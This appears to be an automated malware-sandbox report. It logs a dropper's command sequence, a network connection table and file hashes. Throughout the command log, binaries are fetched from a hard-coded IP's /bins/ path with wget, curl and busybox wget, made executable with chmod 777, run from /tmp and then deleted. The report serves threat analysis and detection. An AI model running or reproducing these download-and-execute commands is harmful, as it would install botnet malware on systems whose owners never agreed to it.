[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |